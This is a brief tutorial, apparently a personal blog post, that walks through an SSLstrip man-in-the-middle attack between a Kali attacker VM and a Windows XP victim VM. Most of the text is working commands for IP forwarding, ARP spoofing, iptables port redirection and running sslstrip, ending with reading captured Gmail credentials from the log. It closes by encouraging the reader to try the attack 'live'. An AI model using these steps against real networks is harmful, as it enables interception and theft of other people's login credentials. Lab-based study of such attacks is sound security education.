Let us set two virtual machines, on one machine we run Windows XP (victim) and on the other machine we run Kali (Attacker).
Before we actually target the victim machine using SSLstrip, we need to setup the entire
Man in the Middle Mechanism and packet redirection / forwarding mechanism.
We try to follow step by step method to do so :
Please note ip address of both machines and they should be kept on NAT network.
From step 1 to 4 give all commands should be given in Kali on terminal.
1. Setting up IP Forwarding: (Use in Kali)
echo 1 > /proc/sys/net/ipv4/ip_forward
2. ARP MITM attack between Victim (Windows XP ) and Gateway:
arpspoof -i eth0 -t 192.168.1.6 192.168.1.1
3. Setting up port redirection using Iptables from port 80 to port 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)
sslstrip –l 10000
5. In
Windows Xp login to gmail and enter the credential. (Observe that any https
site is changed to http)
6. To check
in Kali give the command
Cat sslstrip.log
7. We can see the credential in sslstrip.log file.
WOW !! AMAZING..... if you want to try live you can use bootable kali.
Hope you enjoyed sslstrip with kali...
By GEETA SINGH
